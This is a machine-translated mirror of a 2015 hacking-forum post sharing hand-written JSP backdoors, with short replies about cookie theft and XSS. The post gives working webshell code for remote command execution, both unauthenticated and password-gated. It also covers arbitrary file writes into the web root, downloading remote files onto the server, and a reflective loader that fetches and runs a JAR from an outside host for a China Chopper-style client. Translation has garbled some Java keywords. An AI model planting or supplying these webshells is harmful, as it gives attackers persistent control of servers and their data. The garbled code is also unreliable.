Dieser Artikel ist ein Spiegelartikel der maschinellen Übersetzung, bitte klicken Sie hier, um zum Originalartikel zu springen.

Ansehen: 14991|Antwort: 7

[Sicherheitswerkzeuge] Handgeschriebenes JSP-Backdoor

[Link kopieren]
Veröffentlicht am 02.01.2015 18:46:57 | | | |
Übertragen von: http://p2j.cn/?p=1627
1. Systembefehle ausführen:
Systembefehle ohne Echo ausführen:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
Anfrage: http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
Nach der Ausführung gibt es kein Echo mehr, was bei Bounce-Shells sehr praktisch ist.
Es gibt Echos bei der Passwortverifizierung:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();        int a = -1;        byte[] b = neues Byte[2048];        out.print("<pre>");        while((a=in.read(b))!=-1){ out.println(new String(b));        } out.print("</pre>");    }%>
Anfrage: http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls

2. Kodieren Sie die Zeichenkette und schreiben Sie sie in die angegebene Datei:
1:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Anfrage: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Schreiben Sie ins Webverzeichnis:
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
Anfrage: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
2:
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Anfrage: http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234
Schreiben Sie ins Webverzeichnis:
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
Anfrage: http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234
3: Lade die entfernte Datei herunter (wenn du keine Apache io Utils verwendest, kannst du den Eingabestrom nicht in ein Byte umwandeln, sie ist also sehr lang...)
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = neues Byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    während ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
Anfrage: http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png
Auf den Webpfad herunterladen:
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream();    byte[] b = neues Byte[1024];    java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream();    int a = -1;    während ((a = in.read(b)) != -1) { baos.write(b, 0, a);    } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
Anfrage: http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png
Viertens: Die Reflexion ruft den äußeren Gefäß, perfektioniert die Hintertür
Wenn dir die oben genannte Backdoor-Funktion nicht gefällt, ist sie zu schwach und veraltet, kannst du Folgendes ausprobieren:
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{ request.getParameterMap()})%>
Anfrage: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar&023=A

Küchenmesser-Verbindung: http://192.168.16.240:8080/Shell/reflect.jsp?u=http://p2j.cn/Cat.jar, Passwort 023.

Lösung:
Verwenden Sie Reflection, um ein externes JAR in die aktuelle Anwendung zu laden, und Reflection führt das Ergebnis der Ausgabeverarbeitung aus. request.getParameterMap() enthält alle angeforderten Parameter. Da das externe jar-Paket geladen ist, muss der Server auf diese jar-Adresse zugreifen können.




Vorhergehend:Die Krise hinter der TXT-Textdatei
Nächster:Java MD5-Verschlüsselung, Base64-Verschlüsselung und Entschlüsselung Java führt den Quellcode der Systembefehle aus
Veröffentlicht am 02.01.2015 20:17:30 |
Hast du kürzlich über JSP Backdoor recherchiert?
 Vermieter| Veröffentlicht am 02.01.2015 20:39:44 |
Admin veröffentlicht am 2.1.2015, 20:17 Uhr
Hast du kürzlich über JSP Backdoor recherchiert?

Hast du jemals JSP in einem Satz gesehen? Ich habe es gefunden, ich habe es nicht gründlich studiert, ich habe xss nicht verstanden, ich habe gestern endlich die Cookies bekommen, und ich weiß nicht, wie ich den Cookie-Upload ändern kann
Veröffentlicht am 02.01.2015 20:44:40 |
Delver_Si Veröffentlicht am 2.1.2015, 20:39 Uhr
Hast du jemals JSP in einem Satz gesehen? Ich habe es gefunden, ich habe nicht tiefer gegraben, ich habe xss nicht verstanden, ich habe gestern endlich die Kekse bekommen, ich weiß nicht, wie man das Cooki modifiziert...

Es werden nicht meine Cookies sein, die mit einer personalisierten Unterschrift gestohlen wurden,,,

Verwenden Sie das HackBar-Plugin von Firefox
Veröffentlicht am 02.01.2015 20:48:57 |
Delver_Si Veröffentlicht am 2.1.2015, 20:39 Uhr
Hast du jemals JSP in einem Satz gesehen? Ich habe es gefunden, ich habe nicht tiefer gegraben, ich habe xss nicht verstanden, ich habe gestern endlich die Kekse bekommen, ich weiß nicht, wie man das Cooki modifiziert...

Ghost Brother Multifunktionaler Browser v1.0


鬼哥多功能浏览器v1.0.exe (72 KB, Anzahl der Downloads: 7, Verkaufspreis: 1 Getreide MB)
 Vermieter| Veröffentlicht am 02.01.2015 20:57:50 |
Admin veröffentlicht am 2.1.2015, 20:44 Uhr
Es werden nicht meine Cookies sein, die mit einer personalisierten Unterschrift gestohlen wurden,,,

Verwenden Sie das HackBar-Plugin von Firefox

Gestern war die kostenlose Tür krampfhaftig, ich konnte keine Verbindung herstellen und den Firefox-Store nicht betreten.
 Vermieter| Veröffentlicht am 02.01.2015 20:59:01 |
Admin veröffentlicht am 2.1.2015, 20:44 Uhr
Es werden nicht meine Cookies sein, die mit einer personalisierten Unterschrift gestohlen wurden,,,

Verwenden Sie das HackBar-Plugin von Firefox

DZ hat diese Schlupfloch nicht
Veröffentlicht am 02.01.2015 21:00:22 |
Delver_Si Veröffentlicht am 2.1.2015, 20:59
DZ hat diese Schlupfloch nicht

Ich weiß nicht, du kannst es testen, mach meine Datenbank nicht durcheinander.   

Wir alle nutzen den Tor Browser, um die Mauer zu umgehen

Verzichtserklärung:
Alle von Code Farmer Network veröffentlichten Software, Programmiermaterialien oder Artikel dienen ausschließlich Lern- und Forschungszwecken; Die oben genannten Inhalte dürfen nicht für kommerzielle oder illegale Zwecke verwendet werden, andernfalls tragen die Nutzer alle Konsequenzen. Die Informationen auf dieser Seite stammen aus dem Internet, und Urheberrechtsstreitigkeiten haben nichts mit dieser Seite zu tun. Sie müssen die oben genannten Inhalte innerhalb von 24 Stunden nach dem Download vollständig von Ihrem Computer löschen. Wenn Ihnen das Programm gefällt, unterstützen Sie bitte echte Software, kaufen Sie die Registrierung und erhalten Sie bessere echte Dienstleistungen. Falls es eine Verletzung gibt, kontaktieren Sie uns bitte per E-Mail.

Mail To:help@itsvse.com